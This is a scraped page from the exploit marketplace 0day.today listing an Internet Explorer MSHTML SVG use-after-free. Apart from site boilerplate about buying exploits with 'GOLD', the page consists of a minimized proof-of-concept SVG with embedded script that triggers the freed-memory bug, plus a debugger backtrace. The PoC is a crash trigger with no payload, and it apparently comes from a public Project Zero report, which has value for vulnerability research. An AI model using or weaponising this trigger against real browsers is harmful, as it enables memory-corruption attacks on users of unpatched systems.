0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Microsoft Internet Explorer - MSHTML!CSVGHelpers::SetAttributeStringAndPointer Use-After-Free (MS16-
Author
Risk
[
Security Risk High
]0day-ID
Category
Date add
CVE
Platform
<!-- Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=691 Minimized PoC: --> <svg xmlns="http://www.w3.org/2000/svg" xlink="http://www.w3.org/1999/xlink"> <pattern id="outer"><rect id="rect"><pattern id="inner"></pattern></rect></pattern> <script><![CDATA[ function handler() { inner.setAttribute("viewBox"); } outer.addEventListener("DOMAttrModified", function () { handler(); }); doc = document.implementation.createDocument("", "", null); doc.adoptNode(rect.attributes[0]); ]]></script> </svg> <!-- Backtrace for reference: 2:052:x86> k 10 ChildEBP RetAddr WARNING: Stack unwind information not available. Following frames may be wrong. 0bb14b64 6ad180b8 vrfcore!VerifierStopMessageEx+0x571 0bb14b88 67fec434 vrfcore!VerifierDisableVerifier+0x748 0bb14bdc 67fea3dc verifier_67fe0000!VerifierStopMessage+0x74 0bb14c40 67fe733d verifier_67fe0000!AVrfpDphReportCorruptedBlock+0x10c 0bb14ca4 67fe7495 verifier_67fe0000!AVrfpDphFindBusyMemoryNoCheck+0x7d 0bb14cc8 67feb651 verifier_67fe0000!AVrfpDphFindBusyMemory+0x15 0bb14ce0 67ff0b12 verifier_67fe0000!AvrfpDphCheckPageHeapAllocation+0x41 0bb14cf0 67f93246 verifier_67fe0000!VerifierCheckPageHeapAllocation+0x12 0bb14d4c 60dca53f vfbasics+0x13246 0bb14d68 604cce4e MSHTML!MemoryProtection::HeapFree+0x46 0bb14d70 60b07866 MSHTML!ProcessHeapFree+0x10 0bb14d88 60baac6b MSHTML!CSVGHelpers::SetAttributeStringAndPointer<CRectF,CSVGRe ct>+0xb6 0bb14de8 60e18b69 MSHTML!PROPERTYDESC::HandleStringProperty+0x110 0bb14e14 607e30e6 MSHTML!PROPERTYDESC::CallHandler+0x855996 0bb14e54 60b83323 MSHTML!CElement::SetAttributeFromPropDesc+0xbe 0bb14ee4 607e2f44 MSHTML!CElement::ie9_setAttributeNSInternal+0x2ee --> # 0day.today [2024-09-19] #